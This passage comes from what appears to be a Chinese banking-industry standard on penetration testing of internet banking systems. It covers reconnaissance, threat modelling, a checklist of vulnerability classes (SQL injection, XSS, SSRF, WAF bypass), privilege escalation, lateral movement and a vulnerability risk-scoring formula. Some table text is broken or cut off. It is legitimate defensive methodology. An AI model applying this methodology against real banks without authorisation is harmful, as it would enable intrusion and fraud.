群體。應(yīng)用的官方補(bǔ)丁列表。安全防護(hù)信息，包括但不限于：已部署的安全防護(hù)產(chǎn)品功能。已部署的安全防護(hù)產(chǎn)品的廠商。其他信息收集滲透測(cè)試可嘗試開展信息收集工作，具體如下：通過互聯(lián)網(wǎng)等公開合法渠道進(jìn)一步收集與本滲透測(cè)試相關(guān)的信息如下：相關(guān)文檔資料。郵件列表。所處公共托管環(huán)境。已公開歷史安全漏洞。通過公開渠道所收集的信息如為委托方已泄露的內(nèi)部敏感信息，及時(shí)告知委托方。提升測(cè)試效率及質(zhì)量，經(jīng)委托方同意，實(shí)施方可申請(qǐng)直接從委托方獲取部分測(cè)試對(duì)象相關(guān)信息如下：已使用的各類軟、硬件及其版本。部分源代碼。網(wǎng)絡(luò)拓?fù)洹Ｍ{建模威脅建模是指在分析業(yè)務(wù)功能特征基礎(chǔ)上分析攻擊者動(dòng)機(jī)、判斷最主要威脅場(chǎng)景的過程。不是所有滲透測(cè)試或黑客攻擊都有該流程，在銀行互聯(lián)網(wǎng)滲透測(cè)試實(shí)施階段引入該環(huán)節(jié)的目的是通過分析銀行系統(tǒng)的不同業(yè)務(wù)特性，能更好地判斷攻擊動(dòng)機(jī)，從而開展更加有針對(duì)性的測(cè)試。攻擊動(dòng)機(jī)分析在分析滲透測(cè)試對(duì)象承載的業(yè)務(wù)及其流程的基礎(chǔ)上，分析評(píng)估潛在攻擊者的攻擊動(dòng)機(jī)，具體如下：竊取資金。竊取敏感信息。作為入侵更重要系統(tǒng)的跳板。造成不良社會(huì)影響。威脅主體分析根據(jù)攻擊動(dòng)機(jī)分析結(jié)果，分析評(píng)估潛在的威脅主體及其能力，具體如下：分析潛在外部威脅主體：逐利的黑產(chǎn)團(tuán)伙。追求知名度的非授權(quán)安全技術(shù)人員。敵對(duì)政治勢(shì)力。無政府主義組織。分析潛在內(nèi)部威脅主體：心懷惡意的員工。外包技術(shù)支持人員。主要攻擊場(chǎng)景判斷在攻擊動(dòng)機(jī)分析和威脅主體分析基礎(chǔ)上，明確本次滲透所需要模擬的最主要攻擊場(chǎng)景，并據(jù)此調(diào)整滲透測(cè)試案例及工具方法。漏洞發(fā)現(xiàn)基礎(chǔ)漏洞發(fā)現(xiàn)滲透測(cè)試的基礎(chǔ)漏洞發(fā)現(xiàn)宜滿足如下一般性操作要點(diǎn)：在使用自動(dòng)化漏洞掃描工具檢測(cè)漏洞的同時(shí)，根據(jù)威脅建模結(jié)果，有重點(diǎn)地開展手工漏洞檢測(cè)工作。在生產(chǎn)環(huán)境中，不直接實(shí)施影響系統(tǒng)正常對(duì)外提供業(yè)務(wù)服務(wù)的漏洞檢測(cè)技術(shù)。根據(jù)目標(biāo)系統(tǒng)性能情況控制自動(dòng)化漏洞掃描工具的并發(fā)數(shù)。在生產(chǎn)環(huán)境中，不直接對(duì)原有數(shù)據(jù)進(jìn)行篡改。應(yīng)用層漏洞發(fā)現(xiàn)根據(jù)信息收集情況，嘗試檢測(cè)發(fā)現(xiàn)潛在的應(yīng)用層漏洞，具體如下：檢測(cè)應(yīng)用在身份鑒別方面的漏洞，包括但不限于：弱口令。圖片驗(yàn)證碼繞過。認(rèn)證繞過。會(huì)話未正常結(jié)束。登錄請(qǐng)求重放。短信驗(yàn)證碼泄露。檢測(cè)應(yīng)用在訪問控制方面的漏洞，包括但不限于：越權(quán)訪問。交易步驟繞過。內(nèi)部接口暴露。后臺(tái)安全防控模型繞過。檢測(cè)應(yīng)用在敏感數(shù)據(jù)保護(hù)方面的漏洞，包括但不限于：重要業(yè)務(wù)參數(shù)篡改與偽造。數(shù)據(jù)訪問頻度控制不足。數(shù)據(jù)重放。返回非業(yè)務(wù)所需敏感數(shù)據(jù)。檢測(cè)應(yīng)用在網(wǎng)站實(shí)現(xiàn)層面的漏洞，包括但不限于：結(jié)構(gòu)化查詢語言（SQL，StructuredQueryLanguage）注入。操作系統(tǒng)命令注入?？蓴U(kuò)展標(biāo)記語言（XML，ExtensibleMarkupLanguage）注入。代碼注入?？缯灸_本（XSS，CrossSiteScripting）?？缯菊?qǐng)求偽造（CSRF，CrossSiteRequestForgery）。可執(zhí)行文件上傳。任意文件下載。服務(wù)端請(qǐng)求偽造（SSRF，ServerSideRequestForgery）。不正確的目錄及頁面訪問控制。不正確的錯(cuò)誤處理。存在通用應(yīng)用層框架已知漏洞。檢測(cè)應(yīng)用在客戶端程序?qū)崿F(xiàn)層面的漏洞，包括但不限于：緩沖區(qū)溢出。敏感信息截取。功能接口濫用。程序邏輯逆向破解。生物識(shí)別突破。密碼密鑰硬編碼。網(wǎng)絡(luò)層漏洞發(fā)現(xiàn)根據(jù)信息收集情況，嘗試檢測(cè)發(fā)現(xiàn)潛在的網(wǎng)絡(luò)層漏洞，具體如下：檢測(cè)網(wǎng)絡(luò)傳輸?shù)拿舾行畔⑹欠褚巡扇∮行У谋Ｃ苄院屯暾员Ｗo(hù)措施，包括但不限于：機(jī)密數(shù)據(jù)是否加密傳輸。所使用密碼算法是否安全。檢測(cè)相關(guān)網(wǎng)絡(luò)協(xié)議的安全性，包括但不限于：域名解析協(xié)議。路由交換協(xié)議。網(wǎng)絡(luò)管理協(xié)議。文件傳輸協(xié)議。無線射頻協(xié)議。檢測(cè)網(wǎng)絡(luò)安全策略中可能存在的漏洞，包括但不限于：防火墻策略不嚴(yán)格。入侵防御系統(tǒng)（IPS，IntrusionPreventionSystem）策略繞過。入侵檢測(cè)系統(tǒng)（IDS，IntrusionDetectionSystem）策略繞過。網(wǎng)站應(yīng)用級(jí)防火墻（WAF，WebApplicationFirewall）策略繞過。檢測(cè)網(wǎng)絡(luò)設(shè)備中軟件版本存在的已知漏洞。檢測(cè)網(wǎng)絡(luò)設(shè)備中存在的配置漏洞，包括但不限于：弱口令。權(quán)限過高。未限制遠(yuǎn)程管理地址。系統(tǒng)層漏洞發(fā)現(xiàn)根據(jù)信息收集情況，嘗試檢測(cè)發(fā)現(xiàn)潛在的系統(tǒng)層漏洞，具體如下：檢測(cè)相關(guān)系統(tǒng)存在的已知版本漏洞。檢測(cè)相關(guān)系統(tǒng)存在的配置漏洞，包括但不限于：弱口令。訪問控制不嚴(yán)格。權(quán)限過高。檢測(cè)相關(guān)系統(tǒng)在敏感數(shù)據(jù)存儲(chǔ)方面的漏洞，包括但不限于：敏感信息明文存儲(chǔ)。測(cè)試數(shù)據(jù)未變形。滲透攻擊攻擊驗(yàn)證內(nèi)容在滲透攻擊階段通過模擬實(shí)際攻擊，嘗試對(duì)漏洞的保密性、完整性、可用性及可能造成的實(shí)質(zhì)影響進(jìn)行驗(yàn)證，具體內(nèi)容包括但不限于：通過模擬實(shí)際攻擊，驗(yàn)證可能對(duì)保密性造成的實(shí)質(zhì)影響，包括但不限于：獲取網(wǎng)絡(luò)中敏感數(shù)據(jù)。獲取服務(wù)器中敏感文件。獲取數(shù)據(jù)庫敏感信息。獲取應(yīng)用系統(tǒng)中未授權(quán)訪問的敏感信息。通過模擬實(shí)際攻擊，驗(yàn)證可能對(duì)完整性造成的實(shí)質(zhì)影響，包括但不限于：獲取數(shù)據(jù)庫操作權(quán)限。獲取服務(wù)器控制權(quán)限。獲取專用設(shè)備控制權(quán)限。獲取應(yīng)用系統(tǒng)管理權(quán)限。篡改網(wǎng)站頁面、應(yīng)用邏輯等應(yīng)用系統(tǒng)的各個(gè)組成部分。篡改交易金額、賬戶、時(shí)間、重要提示信息等關(guān)鍵交易要素。破壞交易的不可否認(rèn)性。通過模擬實(shí)際攻擊，驗(yàn)證可能對(duì)可用性造成的實(shí)質(zhì)影響，包括但不限于：導(dǎo)致網(wǎng)絡(luò)不可用。導(dǎo)致服務(wù)器不可用。導(dǎo)致應(yīng)用程序不可用。導(dǎo)致數(shù)據(jù)庫服務(wù)不可用。攻擊過程在滲透攻擊階段宜嘗試實(shí)施如下攻擊過程：驗(yàn)證單個(gè)漏洞的可利用性及可能造成的實(shí)質(zhì)影響。嘗試通過多個(gè)漏洞的關(guān)聯(lián)利用驗(yàn)證漏洞的綜合可利用性及可能造成的實(shí)質(zhì)影響。攻擊獲取權(quán)限后，如非系統(tǒng)最高權(quán)限，嘗試開展權(quán)限提升可行性驗(yàn)證。攻擊獲取權(quán)限后，嘗試橫向滲透。以已有成果為基礎(chǔ)，重復(fù)信息收集、威脅建模、漏洞發(fā)現(xiàn)、滲透攻擊等環(huán)節(jié)，確定進(jìn)一步攻擊滲透其他目標(biāo)的可能性。如具有可能性，開展相關(guān)驗(yàn)證工作。攻擊實(shí)施完成后保存相關(guān)證據(jù)，包括但不限于截圖、錄像等。攻擊實(shí)施完成并保存相關(guān)證據(jù)后，開展現(xiàn)場(chǎng)清理工作，確保應(yīng)用系統(tǒng)得到恢復(fù)，包括但不限于刪除上傳的文件、刪除增加的用戶、刪除安裝的工具等。風(fēng)險(xiǎn)控制在滲透攻擊階段宜采取如下措施控制實(shí)施風(fēng)險(xiǎn)：攻擊實(shí)施前在測(cè)試用例中說明含詳盡步驟的攻擊實(shí)施方案。攻擊實(shí)施過程每個(gè)步驟的指令及結(jié)果均在測(cè)試日志中進(jìn)行詳細(xì)記錄。如滲透測(cè)試執(zhí)行過程涉及非法定必要的第三方人員，宜從如下方面做好工作：評(píng)估第三方人員可執(zhí)行的測(cè)試任務(wù)，使第三方人員僅接觸必要且可控的信息。在相關(guān)工作實(shí)施前與第三方人員及其派出單位簽署保密協(xié)議。在項(xiàng)目實(shí)施過程中，第三方人員不能使用未經(jīng)授權(quán)的設(shè)備，必要時(shí)不能攜帶電子設(shè)備入場(chǎng)。項(xiàng)目完成后，在做好備份的前提下，監(jiān)督第三方人員清除測(cè)試現(xiàn)場(chǎng)，刪除測(cè)試相關(guān)數(shù)據(jù)，妥善處置紙質(zhì)記錄文檔。如相關(guān)工作的實(shí)施風(fēng)險(xiǎn)在生產(chǎn)環(huán)境不可接受，則在仿真環(huán)境中開展。示例：對(duì)重要業(yè)務(wù)系統(tǒng)的DDOS攻擊測(cè)試，在仿真環(huán)境中開展。測(cè)試執(zhí)行階段文檔JR/T0101—2013中第11JR/T0101—2013中第12JR/T0101—2013中第15滲透測(cè)試總結(jié)概述滲透測(cè)試總結(jié)（以下簡稱測(cè)試總結(jié)）包括整理和分析測(cè)試數(shù)據(jù)，說明實(shí)際測(cè)試與測(cè)試策劃和測(cè)試設(shè)計(jì)的差異，進(jìn)行測(cè)試充分性分析并描述未能解決的測(cè)試事件，進(jìn)行測(cè)試結(jié)果匯總，給出建議和結(jié)論并說明依據(jù)，編制測(cè)試總結(jié)報(bào)告，并通過測(cè)試評(píng)審。在應(yīng)急測(cè)試時(shí)，編制測(cè)試綜合報(bào)告中涉及到測(cè)試總結(jié)的相關(guān)內(nèi)容并最終完成測(cè)試綜合報(bào)告。在認(rèn)為必要時(shí)，可編制測(cè)試工作總結(jié)。測(cè)試數(shù)據(jù)分析對(duì)所有的測(cè)試日志進(jìn)行分析。根據(jù)是否需要進(jìn)行回歸測(cè)試判定測(cè)試日志記錄（包括采用信息化手段進(jìn)行的記錄）的完整性，確認(rèn)根據(jù)測(cè)試日志得出測(cè)試結(jié)論的充分性和可信性。差異分析分析測(cè)試日志和測(cè)試事件報(bào)告記錄的測(cè)試過程與測(cè)試策劃和測(cè)試規(guī)格說明的一致性，對(duì)不一致的內(nèi)容進(jìn)行分析以判定是否實(shí)現(xiàn)了預(yù)定的測(cè)試覆蓋。按照基線管理策略，在此時(shí)對(duì)測(cè)試策劃和測(cè)試規(guī)格說明進(jìn)行變更的，宜進(jìn)行必要的回歸測(cè)試以保證最小的測(cè)試覆蓋。風(fēng)險(xiǎn)決策根據(jù)分析分析目的漏洞定級(jí)既考慮了技術(shù)風(fēng)險(xiǎn)，又考慮了銀行業(yè)務(wù)的特性以及監(jiān)管規(guī)定。本文件的應(yīng)用者有較為統(tǒng)一的漏洞定級(jí)方法，為統(tǒng)一管理評(píng)價(jià)奠定基礎(chǔ)。分析維度對(duì)風(fēng)險(xiǎn)的分析宜按照如下維度進(jìn)行：信息系統(tǒng)重要性考量：受漏洞影響的信息系統(tǒng)整體重要性。受漏洞影響的具體功能模塊的重要性。漏洞對(duì)信息系統(tǒng)安全屬性的影響程度考量：對(duì)保密性的影響程度。對(duì)完整性的影響程度。對(duì)可用性的影響程度。漏洞本身的利用難度考量：漏洞被利用的前提條件限制。針對(duì)漏洞的攻擊發(fā)起路徑。攻擊工具的獲取難度及操作復(fù)雜度。遵從性主要考量漏洞的存在是否違背國家法律、法規(guī)及相關(guān)行業(yè)監(jiān)管規(guī)定的情況。根據(jù)上述描述可將漏洞帶來的風(fēng)險(xiǎn)分為嚴(yán)重、高、中、低、提示五個(gè)級(jí)別，具體定級(jí)方法見附錄B。報(bào)告編寫總體設(shè)計(jì)銀行互聯(lián)網(wǎng)滲透測(cè)試報(bào)告宜按照J(rèn)R/T0101—2013中第14范圍概要描述本滲透測(cè)試的工作范圍，宜特別說明是否對(duì)生產(chǎn)環(huán)境進(jìn)行測(cè)試。在認(rèn)為必要時(shí)，可說明哪些內(nèi)容沒有包括在本滲透測(cè)試中。引用文件引用列出所有適用的引用文件。尤其是外部有關(guān)滲透測(cè)試的文件，以及內(nèi)部的測(cè)試策劃、測(cè)試規(guī)格說明文檔。為了便于閱讀，宜說明對(duì)引用文件摘錄到本測(cè)試總結(jié)報(bào)告中的情況。測(cè)試概要情況測(cè)試概要情況宜包括以下內(nèi)容：規(guī)劃及準(zhǔn)備階段各個(gè)環(huán)節(jié)的概要描述包括：委托方、實(shí)施方、實(shí)施人員。測(cè)試目標(biāo)。測(cè)試對(duì)象。測(cè)試內(nèi)容。測(cè)試方法。實(shí)施環(huán)境。工具清單。案例清單。在測(cè)試數(shù)據(jù)分析（8.2）的基礎(chǔ)上，描述實(shí)施階段各個(gè)環(huán)節(jié)具體開展情況的概要描述包括：信息收集情況。威脅建模結(jié)論。漏洞發(fā)現(xiàn)情況。滲透攻擊情況。在差異分析（8.3）的基礎(chǔ)上，說明制定的測(cè)試策劃、測(cè)試規(guī)格說明與測(cè)試執(zhí)行的差異以及必要的回歸測(cè)試情況。決策根據(jù)與結(jié)論和建議決策根據(jù)與結(jié)論和建議宜包括如下內(nèi)容：描述包括風(fēng)險(xiǎn)決策根據(jù)分析（8.4）的內(nèi)容。所發(fā)現(xiàn)漏洞的詳細(xì)技術(shù)分析及整改建議包括：漏洞在信息系統(tǒng)中的具體位置。漏洞的可利用情況及相關(guān)證據(jù)。漏洞的具體利用方式。漏洞的整改方案建議。所發(fā)現(xiàn)漏洞的整體統(tǒng)計(jì)分析及改進(jìn)建議包括：不同維度的統(tǒng)計(jì)分布圖。統(tǒng)計(jì)分析所反映的問題。針對(duì)相關(guān)問題的改進(jìn)建議。測(cè)試評(píng)審在測(cè)試完成后，評(píng)審測(cè)試執(zhí)行過程是否達(dá)到滲透測(cè)試目的。主要對(duì)測(cè)試執(zhí)行過程中的信息收集和漏洞發(fā)現(xiàn)的覆蓋充分性、威脅建模的有效性、滲透攻擊的完整性和深入性，以及攻擊驗(yàn)證內(nèi)容的保密性、完整性、可用性進(jìn)行評(píng)審。評(píng)審的主要內(nèi)容有：評(píng)審信息收集和漏洞發(fā)現(xiàn)的覆蓋充分性。評(píng)審?fù){建模的有效性。評(píng)審攻擊驗(yàn)證內(nèi)容的保密性、完整性、可用性，以及攻擊過程的深入性。測(cè)試總結(jié)階段文檔按照J(rèn)R/T0101—2013中第14章規(guī)定的要求，編制測(cè)試總結(jié)報(bào)告。JR/T0101—2013中第15在認(rèn)為必要時(shí)，可按照J(rèn)R/T0101—2013中附錄D.2規(guī)定的要求，編制測(cè)試工作總結(jié)。附錄A（資料性）銀行互聯(lián)網(wǎng)滲透測(cè)試過程要點(diǎn)清單本附錄給出了在進(jìn)行銀行互聯(lián)網(wǎng)滲透測(cè)試設(shè)計(jì)時(shí)需要考慮到的基本測(cè)試要點(diǎn)，見表A.1。表A.1銀行互聯(lián)網(wǎng)滲透測(cè)試過程要點(diǎn)清單一級(jí)項(xiàng)二級(jí)項(xiàng)三級(jí)項(xiàng)測(cè)試要點(diǎn)信息收集基礎(chǔ)信息收集網(wǎng)絡(luò)信息收集IP地址段信息收集開放端口信息收集域名解析記錄收集系統(tǒng)信息收集設(shè)備類型信息收集操作系統(tǒng)版本信息收集已安裝軟件信息收集應(yīng)用信息收集開發(fā)語言信息收集開源框架或插件信息收集功能接口信息收集URL路徑信息收集業(yè)務(wù)功能信息收集業(yè)務(wù)面向的用戶群體信息收集應(yīng)用的官方補(bǔ)丁信息收集安全防護(hù)安全防護(hù)產(chǎn)品功能信息收集安全防護(hù)產(chǎn)品廠商信息收集拓展信息收集互聯(lián)網(wǎng)搜索相關(guān)文檔資料信息收集相關(guān)郵件列表信息收集所處公共托管環(huán)境信息收集已公開歷史安全漏洞信息收集委托方提供信息從委托方獲取相關(guān)信息威脅建模目標(biāo)對(duì)象分析目標(biāo)對(duì)象業(yè)務(wù)分析業(yè)務(wù)流程分析目標(biāo)對(duì)象價(jià)值分析可能包含的敏感信息分析可能的資金竊取途徑分析對(duì)入侵其他重要系統(tǒng)的幫助分析可能造成的社會(huì)影響分析威脅主體分析外部威脅主體分析外部威脅主體的動(dòng)機(jī)及能力分析內(nèi)部威脅主體分析內(nèi)部威脅主體的動(dòng)機(jī)及能力分析主要威脅判斷明確主要攻擊場(chǎng)景明確主要攻擊場(chǎng)景漏洞發(fā)現(xiàn)應(yīng)用層漏洞發(fā)現(xiàn)身份鑒別弱口令檢測(cè)表A.1銀行互聯(lián)網(wǎng)滲透測(cè)試過程要點(diǎn)清單（續(xù)）一級(jí)項(xiàng)二級(jí)項(xiàng)三級(jí)項(xiàng)測(cè)試要點(diǎn)漏洞發(fā)現(xiàn)應(yīng)用層漏洞發(fā)現(xiàn)圖片驗(yàn)證碼繞過檢測(cè)認(rèn)證繞過檢測(cè)會(huì)話未正常結(jié)束檢測(cè)登錄請(qǐng)求重放檢測(cè)短信驗(yàn)證碼泄露檢測(cè)訪問控制越權(quán)訪問檢測(cè)交易步驟繞過檢測(cè)內(nèi)部接口暴露檢測(cè)后臺(tái)安全防控模型繞過檢測(cè)功能邏輯重要業(yè)務(wù)參數(shù)篡改與偽造檢測(cè)頻度控制不足檢測(cè)數(shù)據(jù)重放檢測(cè)返回非業(yè)務(wù)所需敏感數(shù)據(jù)檢測(cè)網(wǎng)站程序?qū)崿F(xiàn)SQL注入檢測(cè)操作系統(tǒng)命令注入檢測(cè)XML注入檢測(cè)代碼注入檢測(cè)XSS檢測(cè)CSRF檢測(cè)可執(zhí)行文件上傳檢測(cè)任意文件下載檢測(cè)SSRF檢測(cè)不正確的目錄及頁面訪問控制檢測(cè)不正確的錯(cuò)誤處理檢測(cè)存在通用應(yīng)用層框架已知漏洞檢測(cè)客戶端程序?qū)崿F(xiàn)緩沖區(qū)溢出檢測(cè)敏感信息截取檢測(cè)功能接口濫用檢測(cè)程序邏輯逆向破解檢測(cè)生物識(shí)別突破檢測(cè)密碼密鑰硬編碼檢測(cè)網(wǎng)絡(luò)傳輸機(jī)密數(shù)據(jù)是否加密檢測(cè)密碼算法是否安全檢測(cè)網(wǎng)絡(luò)協(xié)議域名解析協(xié)議相關(guān)漏洞檢測(cè)路由交換協(xié)議相關(guān)漏洞檢測(cè)表A.1銀行互聯(lián)網(wǎng)滲透測(cè)試過程要點(diǎn)清單（續(xù)）一級(jí)項(xiàng)二級(jí)項(xiàng)三級(jí)項(xiàng)測(cè)試要點(diǎn)漏洞發(fā)現(xiàn)應(yīng)用層漏洞發(fā)現(xiàn)網(wǎng)絡(luò)管理協(xié)議相關(guān)漏洞檢測(cè)文件傳輸協(xié)議相關(guān)漏洞檢測(cè)無線射頻協(xié)議相關(guān)漏洞檢測(cè)網(wǎng)絡(luò)安全策略防火墻策略不嚴(yán)格檢測(cè)IPS策略繞過檢測(cè)IDS策略繞過檢測(cè)WAF策略繞過檢測(cè)網(wǎng)絡(luò)設(shè)備軟件版本軟件版本已知漏洞檢測(cè)網(wǎng)絡(luò)設(shè)備配置弱口令檢測(cè)權(quán)限過高檢測(cè)遠(yuǎn)程管理地址限制檢測(cè)系統(tǒng)層漏洞發(fā)現(xiàn)系統(tǒng)軟件版本軟件版本已知漏洞檢測(cè)系統(tǒng)軟件配置弱口令檢測(cè)訪問控制不嚴(yán)格檢測(cè)權(quán)限過高檢測(cè)敏感數(shù)據(jù)存儲(chǔ)敏感信息明文存儲(chǔ)檢測(cè)測(cè)試數(shù)據(jù)未變形檢測(cè)滲透攻擊攻擊過程（如無法在生產(chǎn)環(huán)境直接開展，則在仿真環(huán)境開展）單個(gè)漏洞驗(yàn)證（性、可用性三方面造成的實(shí)質(zhì)影響）關(guān)聯(lián)利用嘗試多個(gè)漏洞的關(guān)聯(lián)利用權(quán)限提升嘗試權(quán)限提升橫向滲透可能性保存證據(jù)保存證據(jù)信息現(xiàn)場(chǎng)清理刪除上傳的文件刪除增加的用戶刪除安裝的工具具備前提條件”，并說明具體原因。示例：在設(shè)計(jì)“權(quán)限提升”用例時(shí)，宜以能獲取某個(gè)系統(tǒng)的低級(jí)別權(quán)限的測(cè)試用例為前提。若在漏洞檢測(cè)及模擬利用過程中并未發(fā)現(xiàn)可獲取低級(jí)別權(quán)限的安全漏洞，則“權(quán)限提升”要點(diǎn)即為“不具備前提條件”。附錄B（資料性）銀行互聯(lián)網(wǎng)滲透測(cè)試漏洞風(fēng)險(xiǎn)定級(jí)參考概述本附錄是在參考通用漏洞評(píng)分系統(tǒng)（CVSS，CommonVulnerabilityScoringSystem）、開放式互聯(lián)網(wǎng)應(yīng)用程序安全項(xiàng)目（OWASP，OpenWebApplicationSecurityProject）等漏洞定級(jí)相關(guān)業(yè)界最佳實(shí)踐方法基礎(chǔ)上，結(jié)合銀行信息系統(tǒng)的特點(diǎn)制定。本附錄提出先通過影響程度、資產(chǎn)重要性、可利用性、遵從性4個(gè)參數(shù)計(jì)算出漏洞綜合風(fēng)險(xiǎn)值，再根據(jù)風(fēng)險(xiǎn)值給出定性的漏洞風(fēng)險(xiǎn)等級(jí)判定，具體見下圖，具體測(cè)算方法見本附錄其余各章。圖B弱點(diǎn)綜合風(fēng)險(xiǎn)關(guān)系圖影響程度測(cè)算影響程度由漏洞對(duì)保密性、完整性、可用性的影響3方面決定，不同的影響級(jí)別賦予不同的值，見表B.1。表B.1影響程度測(cè)算影響因子定性分級(jí)定性描述賦值對(duì)保密性的影響無影響不會(huì)導(dǎo)致信息泄露的漏洞。0部分影響aIPJAVA誤信息、服務(wù)器物理路徑等信息。0.275表B.1影響程度測(cè)算（續(xù)）影響因子定性分級(jí)定性描述賦值對(duì)保密性的影響部分影響b)可導(dǎo)致個(gè)別客戶信息被泄露的漏洞。嚴(yán)重影響可導(dǎo)致操作系統(tǒng)、網(wǎng)站后臺(tái)、數(shù)據(jù)庫等系統(tǒng)的管理員權(quán)限被獲取的漏洞。可導(dǎo)致客戶的賬戶權(quán)限被獲取的漏洞?？蓪?dǎo)致大量客戶敏感信息被泄露的漏洞。可導(dǎo)致數(shù)據(jù)庫信息被泄露的漏洞。可導(dǎo)致服務(wù)器上大量敏感信息被泄露的漏洞。示例：漏洞泄露了賬戶密碼或其他公司秘密信息。0.66對(duì)完整性的影響無影響攻擊者無法利用漏洞非法篡改（新增、刪除或修改）目標(biāo)系統(tǒng)上的任何數(shù)據(jù)。0部分影響攻擊者可非法篡改的數(shù)據(jù)范圍非常有限。攻擊者不能非法篡改指定的數(shù)據(jù)，即攻擊者無法控制和使用篡改的數(shù)據(jù)。0.275嚴(yán)重影響可導(dǎo)致操作系統(tǒng)、網(wǎng)站后臺(tái)、數(shù)據(jù)庫等系統(tǒng)的管理員權(quán)限被獲取的漏洞。可導(dǎo)致任意客戶的賬戶權(quán)限被獲取的漏洞。據(jù)。攻擊者可非法篡改目標(biāo)系統(tǒng)的大量數(shù)據(jù)。攻擊者可非法篡改目標(biāo)系統(tǒng)上的核心數(shù)據(jù)，比如資金交易數(shù)據(jù)。0.66對(duì)可用性的影響無影響對(duì)目標(biāo)系統(tǒng)的使用和運(yùn)行無任何影響的漏洞。0部分影響率會(huì)明顯下降。對(duì)網(wǎng)絡(luò)造成部分影響的漏洞，出現(xiàn)一定程度的網(wǎng)絡(luò)延遲。證的重定向和轉(zhuǎn)發(fā)。0.275嚴(yán)重影響可導(dǎo)致操作系統(tǒng)、網(wǎng)站后臺(tái)、數(shù)據(jù)庫等系統(tǒng)的管理員權(quán)限被獲取的漏洞?？蓪?dǎo)致任意客戶的賬戶權(quán)限被獲取的漏洞。導(dǎo)致服務(wù)器無法正常運(yùn)行的漏洞。導(dǎo)致網(wǎng)絡(luò)擁塞、癱瘓或其他影響正常訪問的漏洞。服務(wù)，比如服務(wù)器內(nèi)的數(shù)據(jù)被篡改后，嚴(yán)重影響用戶使用。0.66影響程度的具體測(cè)算公式為：Impact=10.41×(1-(1-ConfImpact)×(1-IntegImpact)×(1-AvailImpact))式中：ConfImpact—對(duì)保密性的影響。IntegImpact—對(duì)完整性的影響。AvailImpact—對(duì)可用性的影響。資產(chǎn)重要性測(cè)算資產(chǎn)重要性由信息系統(tǒng)類別和業(yè)務(wù)交易類型2個(gè)因素決定。信息系統(tǒng)類別是指存在漏洞的信息系統(tǒng)的整體功能屬性，業(yè)務(wù)交易類型是指漏洞所在功能點(diǎn)所對(duì)應(yīng)的功能屬性，具體見表B.2。表B.2資產(chǎn)重要性測(cè)算影響因子定性分級(jí)定性描述賦值信息系統(tǒng)類別A類系統(tǒng)處理JR/T0171—2020的4.2規(guī)定的C3類信息的信息系統(tǒng)。1B類系統(tǒng)處理JR/T0171—2020的4.2規(guī)定的C2類信息的信息系統(tǒng)。2C類系統(tǒng)處理JR/T0171—2020的4.2規(guī)定的C1類信息的信息系統(tǒng)。3D類系統(tǒng)處理不包含在JR/T0171—2020的4.2規(guī)定信息的信息系統(tǒng)。4業(yè)務(wù)交易類型資金交易類不屬于此范疇。1業(yè)務(wù)變更類（簽訂業(yè)務(wù)、電子合同簽署、電子保單等。2業(yè)務(wù)查詢類僅僅是一個(gè)查詢的平臺(tái)，不能進(jìn)行任何資金交易和信息業(yè)務(wù)變更。3其他類不涉及客戶數(shù)據(jù)及業(yè)務(wù)辦理，比如業(yè)務(wù)介紹、廣告、咨詢平臺(tái)。涉及其他與業(yè)務(wù)無關(guān)的數(shù)據(jù)，比如與業(yè)務(wù)無關(guān)的論壇。漏洞為一般的技術(shù)漏洞，與具體業(yè)務(wù)功能無關(guān)。4資產(chǎn)重要性（Req）的具體測(cè)算公式為：Req=0.2+(8-AppType-FuncType)×1.31/6式中：AppType—信息系統(tǒng)類別。FuncType—業(yè)務(wù)交易類型。影響程度修正AdjustedImpact=min(10,10.41×(1-(1-ConfImpact×Req)×(1-IntegImpact×Req)×(1-AvailImpact×Req)))式中：ConfImpact—對(duì)保密性的影響。Req—資產(chǎn)重要性。IntegImpact—對(duì)完整性的影響。AvailImpact—對(duì)可用性的影響。可利用性測(cè)算可利用性通過利用發(fā)起路徑、利用復(fù)雜度、登錄認(rèn)證限制3個(gè)維度來測(cè)算，具體見表B.3。表B.3可利用性測(cè)算影響因子定性分級(jí)定性描述賦值發(fā)起路徑遠(yuǎn)程直接通過互聯(lián)網(wǎng)即可遠(yuǎn)程訪問利用的漏洞。用的漏洞。1局域網(wǎng)在內(nèi)網(wǎng)環(huán)境才能利用的漏洞，通過互聯(lián)網(wǎng)上無法直接利用該漏洞。0.646本地如本地提權(quán)漏洞、本地溢出漏洞。U的安全漏洞。0.395利用復(fù)雜度高攻擊者通過復(fù)雜的社會(huì)工程學(xué)的方法才能利用，比如電話、短信或其漏洞。大量的精力或者大量的設(shè)備。如暴力破解、DDOS利用該漏洞需要非常強(qiáng)的專業(yè)水平，利用過程非常復(fù)雜?，F(xiàn)有的安全掃描軟件均無法直接發(fā)現(xiàn)該漏洞。必要的權(quán)限、必要的其他漏洞等。0.35中郵件和短信一對(duì)多地欺騙客戶點(diǎn)擊指定鏈接。進(jìn)行搜索，找到相關(guān)數(shù)據(jù)、或通過其他漏洞可以方便收集的數(shù)據(jù)。的漏洞。和利用該漏洞。0.61低無需聯(lián)系客戶。0.71登錄認(rèn)證限制多次認(rèn)證還需要用戶的手機(jī)驗(yàn)證碼。0.45一次認(rèn)證需要用戶的電子密碼器密碼。目標(biāo)系統(tǒng)的所有認(rèn)證過程都使用同一密碼，算作僅需一次認(rèn)證。目標(biāo)系統(tǒng)的所有認(rèn)證都是使用默認(rèn)密碼，算作僅需一次認(rèn)證。0.56表B.3可利用性測(cè)算（續(xù)）影響因子定性分級(jí)定性描述賦值登錄認(rèn)證限制一次認(rèn)證e)黑客需要一個(gè)實(shí)名認(rèn)證的賬戶才能利用的漏洞。不必認(rèn)證份認(rèn)證證書?？诹钚畔⒖梢酝ㄟ^公開注冊(cè)獲取，注冊(cè)時(shí)不會(huì)驗(yàn)證黑客的真實(shí)身份。0.704可利用性（Exploitability）的具體測(cè)算公式為：Exploitability=20×AccessVector×AccessComplexity×Authentication式中：AccessVector—發(fā)起路徑。漏洞基礎(chǔ)風(fēng)險(xiǎn)值漏洞基礎(chǔ)風(fēng)險(xiǎn)值（BaseScore）是指綜合考慮影響程度、資產(chǎn)重要程度及可利用性后的漏洞風(fēng)險(xiǎn)度量，其具體測(cè)算公式為：BaseScore=(0.6×AdjustedImpact)+(0.4×Exploitability)-1.5式中：AdjustedImpact—影響程度修正。Exploitability—可利用性。遵從性測(cè)算遵從性測(cè)算見表B.4。表B.4遵從性測(cè)算影響因子定性分級(jí)定性描述賦值監(jiān)管及行業(yè)標(biāo)準(zhǔn)無要求可0.9建議宜1應(yīng)應(yīng)1.15必須1.5漏洞綜合風(f